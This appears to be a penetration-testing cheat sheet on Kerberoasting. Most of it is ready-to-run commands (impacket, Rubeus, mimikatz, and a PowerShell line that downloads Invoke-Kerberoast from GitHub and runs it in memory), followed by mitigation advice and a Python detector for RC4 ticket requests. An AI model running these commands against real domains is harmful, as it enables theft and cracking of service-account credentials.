# Kerberoasting

<figure><img src="/files/89damQnrhSXyfBLGmJfl" alt=""><figcaption><p>The service portion of the TGS is encrypted with the service account's password hash</p></figcaption></figure>

{% hint style="warning" %}
The Kerberos service ticket (TGS) has a server portion that is encrypted with the password hash of the service account. Any domain user can request such a ticket, which makes it possible to take the ticket offline and run a password-guessing attack against it.
{% endhint %}

### **Linux**

{% code overflow="wrap" %}

```bash
# -request asks the DC for the TGS of every user with an SPN and writes the hashes in hashcat/JtR format
impacket-GetUserSPNs hacktor.local/triceratops:Sh4rpH0rns -request -outputfile hashes.kerberoast

# Cross-domain: authenticate to one domain and request the ticket of a single user in the target domain
impacket-GetUserSPNs remo.htb/'o.rashed':'MyP@ssw0rd!' -target-domain remo.htb -dc-ip 10.0.2.10 -request -request-user "m.nathan" -outputfile crackme.txt
```

{% endcode %}

<figure><img src="/files/4dd8c2ghc5fdizeTTld7" alt=""><figcaption></figcaption></figure>

### **Windows**

{% code overflow="wrap" %}

```powershell
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast

# Using PowerShell: load Invoke-Kerberoast (Empire) in memory, then write the hashes in hashcat format
iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")

Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast
```

{% endcode %}

### Enumeration

```powershell
# Find user accounts used as service accounts (user objects that carry an SPN)
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
Get-NetUser -SPN
Get-DomainUser -SPN
```

Using impacket tools:

```bash
impacket-GetUserSPNs hacktor.local/grey:digi@123 -dc-ip 192.168.1.50 -request
```

### Rubeus

{% code overflow="wrap" %}

```powershell
Rubeus.exe kerberoast /stats
Rubeus.exe kerberoast /user:svcadmin /simple
# Kerberoast all possible accounts
Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt
Rubeus.exe kerberoast /outfile:hashes.txt
# Or with the native .NET API: request a service ticket for a single SPN into the ticket cache
Add-Type -AssemblyName System.IdentityModel; New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/msp-sqlreport.msp.local"
```

{% endcode %}

### mimikatz

```powershell
# Export the cached Kerberos tickets (including service tickets) to .kirbi files
Invoke-Mimikatz -Command '"kerberos::list /export"'
```

### Kerberos Mitigations

To prevent or mitigate many of these Kerberos attacks, a series of policies can be implemented. Some examples are the following:

* **Enable a strong password policy**: The first step is to avoid weak passwords in domain user accounts. To achieve this, a strong password policy should be implemented by ensuring that the password complexity option is enabled on the Active Directory domain. Moreover, blacklist common predictable terms in passwords such as the company name, years or month names.
* **Avoid accounts without pre-authentication**: Unless it is strictly necessary, no account should have Kerberos pre-authentication disabled. If this cannot be avoided, keep track of these special accounts and give them pseudo-random passwords with a high level of complexity.
* **Avoid executing services on behalf of user accounts**: Avoid services that run in a domain user account context. If a special user account must be used to launch domain services, generate a strong pseudo-random password for that account.
* **Verify PAC**: Enable PAC verification to avoid attacks such as Silver Ticket. To enable this check, set the value *ValidateKdcPacSignature* (DWORD) in the subkey *HKEY\_LOCAL\_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters* to 1.
* **Change passwords periodically**: Set policies that ensure user passwords are changed periodically, for example every 2 to 4 months. As a special case, the *krbtgt* account password should also be changed periodically, since that key is used to create TGTs. The script <https://github.com/microsoft/New-KrbtgtKeys.ps1> can be used for this purpose. Note that the *krbtgt* password must be changed twice to invalidate the current domain tickets, because of caching. Another consideration is that the domain functional level must be Windows Server 2008 or higher in order to manipulate the *krbtgt* account credentials.
* **Disable Kerberos weak encryption types**: Only Kerberos encryption with AES keys should be allowed. Furthermore, Kerberos requests with a lower level of encryption such as RC4 should be monitored, since RC4 is what attack tools usually request.
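A defender-side example of the monitoring point in the last bullet, added here and not part of the original page: it scans Windows Security event 4769 (Kerberos service ticket request) records for RC4/DES ticket requests against user-account SPNs and flags any client that pulls several such tickets within a short window, the usual Kerberoasting footprint. The event records, client addresses and account names are constructed samples; the keys mirror the 4769 fields ServiceName, IpAddress and TicketEncryptionType.

```python
"""Flag Kerberoasting indicators in Windows Security event 4769 records.
Added example, not from the original page. SAMPLE_EVENTS is a constructed stand-in
for 4769 events (ServiceName, IpAddress, TicketEncryptionType, time); feed real
records from Get-WinEvent or a SIEM using the same keys."""
from collections import defaultdict
from datetime import datetime, timedelta

# TicketEncryptionType values in event 4769: 0x17 = RC4-HMAC, 0x1/0x3 = DES (AES is 0x11/0x12).
WEAK_ETYPES = {"0x17", "0x1", "0x3"}

# Constructed sample events: one client pulling RC4 tickets for several
# user-account SPNs within seconds, plus a normal AES request from elsewhere.
SAMPLE_EVENTS = [
    {"time": "2024-05-01T10:00:01", "client": "10.0.2.55", "service": "sqlsvc", "etype": "0x17"},
    {"time": "2024-05-01T10:00:02", "client": "10.0.2.55", "service": "websvc", "etype": "0x17"},
    {"time": "2024-05-01T10:00:03", "client": "10.0.2.55", "service": "backupsvc", "etype": "0x17"},
    {"time": "2024-05-01T10:00:04", "client": "10.0.2.55", "service": "WS01$", "etype": "0x17"},
    {"time": "2024-05-01T10:05:00", "client": "10.0.2.80", "service": "sqlsvc", "etype": "0x12"},
]

def is_user_service(service: str) -> bool:
    """Computer accounts (name ends in $) and krbtgt have random keys: not roastable."""
    return not service.endswith("$") and service.lower() != "krbtgt"

def analyze(events, threshold=3, window_seconds=60):
    """Return (weak_requests, suspects): weak-etype requests for user SPNs, and
    {client: [services]} for clients hitting >= threshold distinct user SPNs
    with weak etypes inside any window_seconds span."""
    weak = [e for e in events if e["etype"] in WEAK_ETYPES and is_user_service(e["service"])]
    per_client = defaultdict(list)
    for e in weak:
        per_client[e["client"]].append((datetime.fromisoformat(e["time"]), e["service"]))
    window = timedelta(seconds=window_seconds)
    suspects = {}
    for client, reqs in per_client.items():
        reqs.sort()  # slide a time window over this client's requests
        for i, (start, _) in enumerate(reqs):
            services = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(services) >= threshold:
                suspects[client] = sorted(services)
                break
    return weak, suspects

if __name__ == "__main__":
    weak, suspects = analyze(SAMPLE_EVENTS)
    print(f"{len(weak)} RC4/DES service-ticket requests for user-account SPNs")
    for client, services in suspects.items():
        print(f"possible Kerberoasting from {client}: {', '.join(services)}")
```

Once RC4 is disabled domain-wide, any 0x17 ticket request for a user SPN is itself worth an alert, regardless of volume.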

### Resources

{% embed url="https://www.microsoft.com/en-us/download/details.aspx?id=36036" %}

